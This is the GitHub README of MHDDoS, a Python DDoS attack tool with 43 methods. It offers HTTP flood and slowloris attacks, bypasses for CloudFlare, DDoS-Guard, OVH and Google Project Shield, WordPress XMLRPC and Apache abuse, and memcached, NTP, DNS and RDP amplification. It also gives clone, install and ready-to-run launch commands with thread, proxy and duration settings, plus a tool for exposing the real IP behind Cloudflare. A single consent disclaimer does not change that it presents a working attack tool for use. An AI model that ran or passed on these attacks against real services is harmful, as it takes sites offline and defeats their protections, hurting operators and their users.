Skip to content

Latest commit

 

History

History
175 lines (141 loc) · 9.75 KB

README.md

File metadata and controls

175 lines (141 loc) · 9.75 KB

aventium softworks

MHDDoS - DDoS Attack Script With 43 Methods

(Programming Language - Python 3)

MHDDoS forks MHDDoS last commit (main) MHDDoS Repo stars MHDDoS License MHDDoS issues

Please Don't Attack websites without the owners consent.

POWER

SCRIPT

Features And Methods

  • 💣 Layer7

    • get GET | GET Flood
    • post POST | POST Flood
    • ovh OVH | Bypass OVH
    • stress STRESS | Send HTTP Packet With High Byte
    • dyn DYN | A New Method With Random SubDomain
    • slow SLOW | Slowloris Old Method of DDoS
    • head HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
    • null NULL | Null UserAgent and ...
    • cookie COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
    • pps PPS | Only 'GET / HTTP/1.1\r\n\r\n'
    • even EVEN | GET Method with more header
    • googleshield GSB | Google Project Shield Bypass
    • DDoSGuard DGB | DDoS Guard Bypass
    • ArvanCloud AVB | Arvan Cloud Bypass
    • Google bot BOT | Like Google bot
    • Apache Webserver APACHE | Apache Expliot
    • wordpress expliot XMLRPC | WP XMLRPC expliot (add /xmlrpc.php)
    • CloudFlare CFB | CloudFlare Bypass
    • CloudFlare UnderAttack Mode CFBUAM | CloudFlare Under Attack Mode Bypass
    • bypass BYPASS | Bypass Normal AntiDDoS
    • bypass BOMB | Bypass with codesenberg/bombardier
  • 🧨 Layer4:

    • tcp TCP | TCP Flood Bypass
    • udp UDP | UDP Flood Bypass
    • syn SYN | SYN Flood
    • vse VSE | Send VSE Protocol
    • mem MEM | Memcached Amplification
    • ntp NTP | NTP Amplification
    • minecraft MINECRAFT | Minecraft Status Ping Protocol
    • dns DNS | DNS Amplification
    • chargen CHAR | Chargen Amplification
    • ard ARD | Apple Remote Desktop Amplification
    • rdp RDP | Remote Desktop Protocol Amplification
  • ⚙️ Tools - Run With python3 start.py tools

    • 🌟 CFIP | Find Real IP Address Of Websites Powered By Cloudflare
    • 🔪 DNS | Show DNS Records Of Sites
    • 📍 TSSRV | TeamSpeak SRV Resolver
    • ⚠ PING | PING Servers
    • 📌 CHECK | Check If Websites Status
    • 😎 DSTAT | That Shows Bytes Received, bytes Sent and their amount
  • 🎩 Other

    • ❌ STOP | STOP All Attacks
    • 🌠 TOOLS | Console Tools
    • 👑 HELP | Show Usage Script

Issues ?

Like the project? Leave a star on the repository!

Downloads

You can download it from GitHub Releases

Getting Started

Requirements


Videos

Toturial


Clone and Install Script

git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt

Launch Script

  • Proxy Types:
Proxy Type Value
All Proxy 0
HTTP 1
SOCKS4 4
SOCKS5 5
RANDOM 6
  • Layer7 (Website):
# Running bypass attack from 101 threads, 
# with socks 5, 100 requests per proxy (connection), for 3600 seconds  
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
  • Layer4 (Server/Home):
# Running udp attack from 1 threads, for 3600 seconds  
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds  
# with reflector servers from dns.txt, for 3600 seconds  
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running dns attack from 1000 threads
# with socks 5, for 3600 seconds  
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
  • Debug Mode (Log Attack status):
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
  • Tools/Help:
python start.py tools
python start.py help

💰 Donation Links: